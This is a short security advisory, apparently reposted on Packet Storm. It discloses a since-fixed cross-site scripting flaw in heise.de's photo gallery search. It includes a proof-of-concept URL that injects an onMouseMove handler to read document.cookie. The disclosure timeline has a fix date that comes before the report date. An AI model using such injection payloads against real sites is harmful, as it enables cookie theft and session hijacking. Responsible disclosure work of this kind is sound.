Heise.de Cross Site Scripting

2013-01-11T00:00:00
ID PACKETSTORM:119469
Type packetstorm
Reporter Stefan Schurtz
Modified 2013-01-11T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Advisory: heise.de - Cross-site Scripting vulnerability  
Advisory ID: SSCHADV2013-002  
Author: Stefan Schurtz  
Affected Software: Successfully tested on heise.de  
Vendor URL: http://www.heise.de  
Vendor Status: fixed  
  
==========================  
Vulnerability Description  
==========================  
  
http://www.heise.de is prone to a XSS vulnerability  
  
==========================  
PoC-Exploit  
==========================  
  
http://www.heise.de/foto/galerie/suche/photo/?suchwort="  
onMouseMove=alert(document.cookie) '  
  
==========================  
Solution  
==========================  
  
fixed  
  
==========================  
Disclosure Timeline  
==========================  
  
03-Jan-2013 - informed heise Security  
04-Jan-2012 - fixed by developer  
  
==========================  
Credits  
==========================  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
==========================  
References  
==========================  
  
http://www.darksecurity.de/advisories/2013/SSCHADV2013-002.tx  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (MingW32)  
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools  
Comment: Download at: http://thunderbird.gnupt.de  
  
iEYEARECAAYFAlDvDLoACgkQg3svV2LcbMDbqgCfTc5ncA0O7zWRT3jOronFOPxC  
Gr4An2tcntS/f/j14F5POgHPNBpxvC13  
=hyEA  
-----END PGP SIGNATURE-----  
  
  
`